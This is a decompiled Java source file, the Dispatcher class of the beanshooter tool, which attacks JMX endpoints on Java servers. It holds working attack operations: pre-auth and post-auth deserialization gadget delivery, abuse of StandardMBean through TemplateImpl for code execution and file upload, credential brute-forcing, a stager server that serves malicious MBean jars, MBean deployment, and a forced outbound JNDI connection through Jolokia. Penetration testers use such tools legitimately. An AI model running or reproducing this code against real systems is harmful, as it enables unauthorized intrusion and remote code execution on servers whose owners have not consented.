/*
 * Decompiled with CFR 0.152.
 */
package de.qtc.beanshooter.operation;

import de.qtc.beanshooter.cli.ArgumentHandler;
import de.qtc.beanshooter.exceptions.AuthenticationException;
import de.qtc.beanshooter.exceptions.ExceptionHandler;
import de.qtc.beanshooter.io.Logger;
import de.qtc.beanshooter.io.WordlistHandler;
import de.qtc.beanshooter.mbean.DynamicMBean;
import de.qtc.beanshooter.mbean.IMBean;
import de.qtc.beanshooter.mbean.MBean;
import de.qtc.beanshooter.networking.StagerServer;
import de.qtc.beanshooter.operation.BeanshooterOperation;
import de.qtc.beanshooter.operation.BeanshooterOption;
import de.qtc.beanshooter.operation.CredentialGuesser;
import de.qtc.beanshooter.operation.EnumHelper;
import de.qtc.beanshooter.operation.MBeanServerClient;
import de.qtc.beanshooter.operation.SerialHelper;
import de.qtc.beanshooter.plugin.PluginSystem;
import de.qtc.beanshooter.utils.DeserializationCanary;
import de.qtc.beanshooter.utils.Utils;
import java.io.IOException;
import java.rmi.UnmarshalException;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
import java.util.NoSuchElementException;
import java.util.Scanner;
import java.util.Set;
import javax.management.Attribute;
import javax.management.MBeanException;
import javax.management.MBeanParameterInfo;
import javax.management.MBeanServerConnection;
import javax.management.ObjectInstance;
import javax.management.ObjectName;
import javax.management.ReflectionException;
import javax.management.RuntimeErrorException;
import javax.management.RuntimeMBeanException;
import javax.management.StandardMBean;
import javax.management.modelmbean.ModelMBeanAttributeInfo;
import javax.management.modelmbean.ModelMBeanInfo;
import javax.management.modelmbean.ModelMBeanInfoSupport;
import javax.management.modelmbean.ModelMBeanOperationInfo;
import javax.management.modelmbean.RequiredModelMBean;
import javax.xml.transform.Templates;
import org.jolokia.client.exception.J4pRemoteException;

public class Dispatcher {
    private MBeanServerClient client;
    private MBeanServerConnection conn;

    protected MBeanServerConnection getMBeanServerConnection() {
        if (this.conn == null) {
            this.conn = this.getMBeanServerConnection(ArgumentHandler.getEnv());
        }
        return this.conn;
    }

    protected MBeanServerConnection getMBeanServerConnection(Map<String, Object> env) {
        String host = (String)ArgumentHandler.require(BeanshooterOption.TARGET_HOST);
        int port = (Integer)ArgumentHandler.require(BeanshooterOption.TARGET_PORT);
        return PluginSystem.getMBeanServerConnection(host, port, env);
    }

    protected MBeanServerClient getMBeanServerClient() {
        if (this.client != null) {
            return this.client;
        }
        if (this.conn == null) {
            this.getMBeanServerConnection();
        }
        this.client = new MBeanServerClient(this.conn);
        return this.client;
    }

    public void deploy() {
        Logger.printlnBlue("Starting MBean deployment.");
        Logger.lineBreak();
        Logger.increaseIndent();
        String mBeanClassName = (String)ArgumentHandler.require(BeanshooterOption.DEPLOY_BEAN_CLASS);
        ObjectName mBeanObjectName = Utils.getObjectName((String)ArgumentHandler.require(BeanshooterOption.DEPLOY_BEAN_NAME));
        MBeanServerClient mBeanServerClient = this.getMBeanServerClient();
        mBeanServerClient.deployMBean(mBeanClassName, mBeanObjectName, (String)BeanshooterOption.DEPLOY_JAR_FILE.getValue());
        Logger.decreaseIndent();
    }

    public void model() {
        ModelMBeanOperationInfo[] ops;
        String className = (String)ArgumentHandler.require(BeanshooterOption.MODEL_CLASS_NAME);
        ObjectName mBeanObjectName = Utils.getObjectName((String)ArgumentHandler.require(BeanshooterOption.MODEL_OBJ_NAME));
        MBeanServerClient mBeanServerClient = this.getMBeanServerClient();
        try {
            Class<?> cls = Class.forName(className);
            ops = Utils.createModelMBeanInfosFromClass(cls);
            Logger.printlnBlue("Deploying RequiredModelMBean supporting methods from " + cls.getName());
        }
        catch (ClassNotFoundException e) {
            if (BeanshooterOption.MODEL_SIGNATURE.isNull() && BeanshooterOption.MODEL_SIGNATURE_FILE.isNull()) {
                Logger.eprintlnMixedYellow("The specified class", className, "cannot be found locally.");
                Logger.eprintMixedBlue("You can still use it by providing method signatures via", "--signature", "or ");
                Logger.eprintlnPlainBlue("--signature-file");
                Utils.exit(e);
            }
            ops = Utils.createModelMBeanInfosFromArg(className);
            Logger.printlnBlue("Deploying RequiredModelMBean supporting user specified methods");
        }
        Logger.lineBreak();
        Logger.increaseIndent();
        ModelMBeanInfoSupport mmbi = new ModelMBeanInfoSupport(className, "ModelMBean", new ModelMBeanAttributeInfo[0], null, ops, null);
        mBeanServerClient.deployMBean(RequiredModelMBean.class.getName(), mBeanObjectName, null, new Object[]{mmbi}, new String[]{ModelMBeanInfo.class.getName()});
        Logger.lineBreak();
        Logger.printlnYellow("Available Methods:");
        for (ModelMBeanOperationInfo op : ops) {
            String ret = op.getReturnType();
            String name = op.getName();
            StringBuilder args = new StringBuilder();
            for (MBeanParameterInfo param : op.getSignature()) {
                args.append(param.getType());
                args.append(", ");
            }
            if (op.getSignature().length > 0) {
                args.setLength(args.length() - 2);
            }
            Logger.printMixedBlue("  -", ret + " ");
            Logger.printPlainYellow(name);
            Logger.printlnPlainBlue("(" + args.toString() + ")");
        }
        if (BeanshooterOption.MODEL_RESOURCE.notNull()) {
            Object managedResource = PluginSystem.strToObj((String)BeanshooterOption.MODEL_RESOURCE.getValue());
            try {
                Logger.lineBreak();
                Logger.printlnMixedYellow("Setting managed resource to:", (String)BeanshooterOption.MODEL_RESOURCE.getValue());
                mBeanServerClient.invoke(mBeanObjectName, "setManagedResource", new String[]{Object.class.getName(), "java.lang.String"}, managedResource, "objectReference");
                Logger.printlnMixedBlue("Managed resource was set", "successfully.");
            }
            catch (IOException | MBeanException | ReflectionException e) {
                ExceptionHandler.showStackTrace(e);
                ExceptionHandler.internalError("model", "Caught " + e.getClass().getName() + " while invoking setManagedResource.");
            }
        }
        Logger.decreaseIndent();
    }

    public void undeploy() {
        ObjectName mBeanObjectName = Utils.getObjectName((String)ArgumentHandler.require(BeanshooterOption.UNDEPLOY_BEAN_NAME));
        MBeanServerClient mBeanServerClient = this.getMBeanServerClient();
        mBeanServerClient.unregisterMBean(mBeanObjectName);
    }

    public void enumerate() {
        boolean access = false;
        boolean enumerated = false;
        String host = (String)ArgumentHandler.require(BeanshooterOption.TARGET_HOST);
        int port = (Integer)ArgumentHandler.require(BeanshooterOption.TARGET_PORT);
        EnumHelper enumHelper = new EnumHelper(host, port);
        enumHelper.boundNames();
        if (BeanshooterOption.CONN_JMXMP.getBool() && BeanshooterOption.CONN_SASL.isNull()) {
            access = enumHelper.enumSASL();
            Logger.lineBreak();
            if (!BeanshooterOption.CONN_SASL.isNull()) {
                enumerated = true;
            }
        }
        if (!access) {
            if (BeanshooterOption.CONN_USER.notNull() && BeanshooterOption.CONN_PASS.notNull()) {
                access = enumHelper.login();
                Logger.lineBreak();
            } else if (BeanshooterOption.CONN_SASL.isNull()) {
                access = enumHelper.enumAccess();
                Logger.lineBreak();
            } else if (!enumerated) {
                Logger.printlnBlue("Checking servers SASL configuration");
                Logger.lineBreak();
                Logger.increaseIndent();
                Logger.printlnMixedBlue("- SASL profile was manually specified but", "no credentials", "were provided.");
                Logger.printMixedYellow("  Use the", "--username", "and ");
                Logger.printlnPlainMixedYellowFirst("--password", "options to provide credentials.");
                Logger.statusUndecided("Configuration");
                Logger.decreaseIndent();
                Logger.lineBreak();
            }
        }
        if (BeanshooterOption.CONN_JOLOKIA.getBool()) {
            enumHelper.enumJolokiaVersion();
        } else {
            enumHelper.enumSerial();
        }
        if (!access) {
            return;
        }
        if (BeanshooterOption.CONN_JOLOKIA.getBool()) {
            Logger.lineBreak();
            enumHelper.enumJolokiaProxy();
        }
        Logger.lineBreak();
        Set<ObjectInstance> mbeans = enumHelper.enumMBeans();
        MBean.performEnumActions(mbeans);
    }

    public void serial() {
        if (BeanshooterOption.CONN_JOLOKIA.getBool()) {
            Logger.eprintlnMixedYellow("The serial action", "is not", "supported for Jolokia based connections.");
            Utils.exit();
        }
        Logger.println("Attemting deserialization attack on JMX endpoint.");
        Logger.lineBreak();
        Logger.increaseIndent();
        Object[] payloadObject = ArgumentHandler.getInstance().getGadget();
        if (!BeanshooterOption.SERIAL_NO_CANARY.getBool()) {
            payloadObject = new Object[]{payloadObject, new DeserializationCanary()};
        }
        try {
            if (BeanshooterOption.CONN_JMXMP.getBool()) {
                SerialHelper.serialJMXMP(payloadObject);
            } else if (BeanshooterOption.SERIAL_PREAUTH.getBool()) {
                SerialHelper.serialPreauth(payloadObject);
            } else {
                String host = (String)ArgumentHandler.require(BeanshooterOption.TARGET_HOST);
                int port = (Integer)ArgumentHandler.require(BeanshooterOption.TARGET_PORT);
                this.conn = PluginSystem.getMBeanServerConnectionUmanaged(host, port, ArgumentHandler.getEnv());
                this.client = new MBeanServerClient(this.conn);
                ObjectName loggingMBean = Utils.getObjectName("java.util.logging:type=Logging");
                this.client.invoke(loggingMBean, "getLoggerLevel", null, new Object[]{payloadObject});
            }
        }
        catch (MBeanException | ReflectionException e) {
            Throwable t = ExceptionHandler.getCause(e);
            if (t instanceof ClassNotFoundException) {
                ExceptionHandler.deserialClassNotFound((ClassNotFoundException)t);
            } else {
                Logger.eprintlnMixedYellow("Encountered unexpected", t.getClass().getName(), "after the payload object was sent.");
            }
            ExceptionHandler.showStackTrace(e);
        }
        catch (SecurityException | RuntimeMBeanException e) {
            Throwable t = ExceptionHandler.getCause(e);
            Logger.eprintlnMixedYellow("Caught", t.getClass().getName(), "after the payload object was sent.");
            if (t instanceof IllegalArgumentException || t instanceof SecurityException) {
                Logger.eprintlnMixedBlue("Payload object probably", "worked anyway.");
            }
            ExceptionHandler.showStackTrace(e);
        }
        catch (UnmarshalException e) {
            Throwable t = ExceptionHandler.getCause(e);
            if (t instanceof ClassNotFoundException) {
                ExceptionHandler.deserialClassNotFound((ClassNotFoundException)t);
            } else {
                Logger.eprintlnMixedYellow("Encountered unexpected", t.getClass().getName(), "after the payload object was sent.");
            }
            ExceptionHandler.showStackTrace(e);
        }
        catch (AuthenticationException e) {
            ExceptionHandler.handleAuthenticationException(e);
            Logger.printlnMixedYellow("Use the", "--preauth", "option to launch deserialization attacks before authentication.");
        }
        catch (IOException e) {
            Throwable t = ExceptionHandler.getCause(e);
            if (t instanceof ClassNotFoundException) {
                ExceptionHandler.deserialClassNotFound((ClassNotFoundException)t);
            } else {
                Logger.eprintlnMixedYellow("Encountered unexpected", t.getClass().getName(), "after the payload object was sent.");
            }
            ExceptionHandler.showStackTrace(e);
        }
        catch (J4pRemoteException e) {
            ExceptionHandler.handleJ4pRemoteException(e, "during deserialization attack");
        }
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     */
    public void standard() {
        String className = StandardMBean.class.getName();
        ObjectName mBeanObjectName = Utils.getObjectName("de.qtc.beanshooter:standard=" + System.nanoTime());
        String operation = "template-" + (String)BeanshooterOption.STANDARD_OPERATION.getValue();
        String arguments = (String)BeanshooterOption.STANDARD_OPERATION_ARGS.getValue();
        if (!operation.equals("template-tonka") && arguments.equals("")) {
            Logger.eprintlnMixedYellow("The " + operation + " action requires", "an additional parameter", "to work with.");
            Utils.exit();
        }
        Logger.printlnBlue("Creating a TemplateImpl payload object to abuse StandardMBean");
        Logger.lineBreak();
        Logger.increaseIndent();
        Object templateGadget = PluginSystem.getPayloadObject(BeanshooterOperation.STANDARD, operation, arguments);
        MBeanServerClient mBeanServerClient = this.getMBeanServerClient();
        String[] ctorArgTypes = new String[]{Object.class.getName(), Class.class.getName()};
        Object[] ctorArgs = new Object[]{templateGadget, Templates.class};
        mBeanServerClient.deployMBean(className, mBeanObjectName, null, ctorArgs, ctorArgTypes);
        Logger.lineBreak();
        try {
            mBeanServerClient.invoke(mBeanObjectName, "newTransformer", new String[0], new Object[0]);
        }
        catch (RuntimeMBeanException e) {
            Throwable t = ExceptionHandler.getCause(e);
            if (t instanceof NullPointerException) {
                Logger.printlnMixedBlue("Caught", "NullPointerException", "while invoking the newTransformer action.");
                Logger.printlnMixedBlue("This is expected bahavior and the attack most likely", "worked", ":)");
            } else {
                ExceptionHandler.unexpectedException(e, "standard", "action", true);
            }
        }
        catch (RuntimeErrorException e) {
            if (operation.equals("template-upload")) {
                String[] split = arguments.split("::");
                if (split.length < 2) {
                    ExceptionHandler.handleFileWrite(e, arguments, false);
                } else {
                    ExceptionHandler.handleFileWrite(e, split[1], false);
                }
            } else {
                ExceptionHandler.unexpectedException(e, "standard", "action", false);
            }
        }
        catch (IOException | MBeanException | ReflectionException e) {
            Throwable t = ExceptionHandler.getCause(e);
            if (t instanceof IllegalAccessError && t.getMessage().contains("module java.xml does not export")) {
                Logger.eprintlnMixedYellow("Caught", "IllegalAccessError", "during template transformation.");
                Logger.eprintlnMixedBlue("The server does not export", "AbstractTranslet", "which prevents the standard action from working.");
                ExceptionHandler.showStackTrace(e);
            } else {
                ExceptionHandler.unexpectedException(e, "standard", "action", false);
            }
        }
        finally {
            Logger.lineBreak();
            mBeanServerClient.unregisterMBean(mBeanObjectName);
        }
    }

    public void brute() {
        String host = (String)ArgumentHandler.require(BeanshooterOption.TARGET_HOST);
        int port = (Integer)ArgumentHandler.require(BeanshooterOption.TARGET_PORT);
        Logger.printlnMixedYellow("Reading wordlists for the", "brute", "action.");
        Logger.increaseIndent();
        Map<String, Set<String>> bruteMap = WordlistHandler.getCredentialMap();
        Logger.decreaseIndent();
        Logger.lineBreak();
        CredentialGuesser guesser = new CredentialGuesser(host, port, bruteMap);
        guesser.startGuessing();
    }

    public void list() {
        MBeanServerClient mBeanServerClient = this.getMBeanServerClient();
        Set<ObjectInstance> instances = mBeanServerClient.getMBeans();
        List<String> interestingMBeans = MBean.getBeanClasses();
        Logger.println("Available MBeans:");
        Logger.lineBreak();
        Logger.increaseIndent();
        for (ObjectInstance instance : instances) {
            if (BeanshooterOption.LIST_FILTER_CLASS.notNull() && !instance.getClassName().toLowerCase().contains((CharSequence)BeanshooterOption.LIST_FILTER_CLASS.getValue()) || BeanshooterOption.LIST_FILTER_OBJ.notNull() && !instance.getObjectName().toString().toLowerCase().contains((CharSequence)BeanshooterOption.LIST_FILTER_OBJ.getValue())) continue;
            if (interestingMBeans.contains(instance.getClassName())) {
                Logger.printMixedRed("  -", instance.getClassName(), "");
            } else {
                Logger.printMixedYellow("  -", instance.getClassName(), "");
            }
            Logger.printlnPlainBlue("(" + instance.getObjectName().toString() + ")");
        }
        Logger.decreaseIndent();
    }

    public void invoke() {
        ObjectName objectName = Utils.getObjectName((String)ArgumentHandler.require(BeanshooterOption.INVOKE_OBJ_NAME));
        String signature = (String)ArgumentHandler.require(BeanshooterOption.INVOKE_METHOD);
        List argumentStringArray = (List)BeanshooterOption.INVOKE_METHOD_ARGS.getValue();
        String[] argumentTypes = PluginSystem.getArgumentTypes(signature);
        Object[] argumentArray = PluginSystem.getArgumentArray(argumentStringArray.toArray(new String[0]));
        String methodName = PluginSystem.getMethodName(signature);
        MBeanServerClient client = this.getMBeanServerClient();
        try {
            Object result = client.invoke(objectName, methodName, argumentTypes, argumentArray);
            if (result != null) {
                PluginSystem.handleResponse(result);
            } else {
                Logger.printlnBlue("Call was successful.");
            }
        }
        catch (IOException | MBeanException | ReflectionException | RuntimeMBeanException e) {
            Throwable t = ExceptionHandler.getCause(e);
            String message = t.getMessage();
            if (message != null && message.contains("No operation " + methodName)) {
                if (message.contains("Known signatures: ")) {
                    ExceptionHandler.noOperationAlternative(e, signature, methodName, message);
                }
                ExceptionHandler.noOperation(e, signature);
            }
            Logger.eprintlnMixedYellow("Caught", e.getClass().getName(), String.format("while invoking %s on %s.", methodName, objectName.toString()));
            Logger.eprintln("beanshooter does not handle exceptions for custom method invocations.");
            ExceptionHandler.stackTrace(e);
        }
    }

    public void stager() {
        int port = (Integer)BeanshooterOption.STAGER_PORT.getValue();
        String host = (String)BeanshooterOption.STAGER_HOST.getValue();
        StagerServer server = new StagerServer(host, port, true);
        String url = BeanshooterOption.DEPLOY_STAGER_URL.getValue(String.format("http://%s:%d", host, port));
        IMBean bean = de.qtc.beanshooter.mbean.mlet.Dispatcher.getMbean();
        server.start(Utils.parseUrl(url), bean.getJarName(), bean.getMBeanClass(), bean.getObjectName().toString());
        Logger.print("Press Enter to stop listening.");
        try (Scanner scanner = new Scanner(System.in);){
            scanner.nextLine();
        }
        catch (NoSuchElementException e) {
            Logger.printlnPlain("");
        }
        server.stop();
    }

    public void attr() {
        Attribute attrObj = null;
        ObjectName objectName = Utils.getObjectName((String)ArgumentHandler.require(BeanshooterOption.INVOKE_OBJ_NAME));
        String attrName = (String)ArgumentHandler.require(BeanshooterOption.ATTR_ATTRIBUTE);
        String attrValue = BeanshooterOption.ATTR_VALUE.getValue(null);
        String typeName = BeanshooterOption.ATTR_TYPE.getValue("String");
        if (attrValue != null) {
            String signature = String.format("void dummy(%s p1)", typeName);
            PluginSystem.getArgumentTypes(signature);
            Object[] argumentArray = PluginSystem.getArgumentArray(new String[]{attrValue});
            attrObj = new Attribute(attrName, argumentArray[0]);
        }
        MBeanServerClient client = this.getMBeanServerClient();
        try {
            if (attrObj != null) {
                client.setAttribute(objectName, attrObj);
            } else {
                Object result = client.getAttribute(objectName, attrName);
                if (result != null) {
                    PluginSystem.handleResponse(result);
                } else {
                    Logger.println("null");
                }
            }
        }
        catch (IOException | MBeanException | ReflectionException e) {
            if (e instanceof ReflectionException && e.getMessage().contains("Cannot find setter method")) {
                Logger.eprintlnMixedYellow("Caught", e.getClass().getName(), String.format("while setting attribute %s from %s", attrName, objectName));
                Logger.eprintlnMixedBlue("There seems to be", "no setter available", "for the requested attribute.");
                Utils.exit(e);
            }
            Logger.eprintlnMixedYellow("Caught", e.getClass().getName(), String.format("while accessing attribute %s from %s", attrName, objectName));
            Logger.eprintln("beanshooter does not handle exceptions for custom attribute access.");
            Utils.exit(e);
        }
    }

    public void info() {
        ArrayList<ObjectName> objectNames = new ArrayList<ObjectName>();
        if (BeanshooterOption.OBJ_NAME.notNull()) {
            ObjectName mBeanObjectName = Utils.getObjectName((String)BeanshooterOption.OBJ_NAME.getValue());
            objectNames.add(mBeanObjectName);
        } else {
            Set<ObjectInstance> instances = this.getMBeanServerClient().getMBeans();
            for (ObjectInstance inst : instances) {
                objectNames.add(inst.getObjectName());
            }
        }
        for (ObjectName objName : objectNames) {
            DynamicMBean mbean = new DynamicMBean(objName, null, null);
            de.qtc.beanshooter.mbean.Dispatcher disp = new de.qtc.beanshooter.mbean.Dispatcher(mbean);
            disp.info();
        }
    }

    public void jolokia() {
        BeanshooterOption.CONN_JOLOKIA.setValue(true);
        PluginSystem.init(null);
        String host = (String)ArgumentHandler.require(BeanshooterOption.JOLOKIA_HOST);
        int port = (Integer)ArgumentHandler.require(BeanshooterOption.JOLOKIA_PORT);
        String name = BeanshooterOption.JOLOKIA_LOOKUP.getValue("beanshooter");
        String proxyUrl = "";
        proxyUrl = BeanshooterOption.JOLOKIA_LDAP.getBool() ? String.format("service:jmx:Rmi:///jndi/ldap://%s:%d/%s", host, port, name) : String.format("service:jmx:Rmi:///jndi/rmi://%s:%d/%s", host, port, name);
        BeanshooterOption.CONN_JOLOKIA_PROXY.setValue(proxyUrl);
        Logger.printlnMixedYellow("Attempting to trigger outboud connection to", String.format("%s:%d", host, port));
        Logger.printlnMixedBlue("Using proxy service URL:", proxyUrl);
        MBeanServerClient mBeanServerClient = this.getMBeanServerClient();
        mBeanServerClient.getMBeans();
        Logger.printlnMixedYellow("Obtained", "no Exception", "while performing the list operation via the specified proxy.");
    }
}

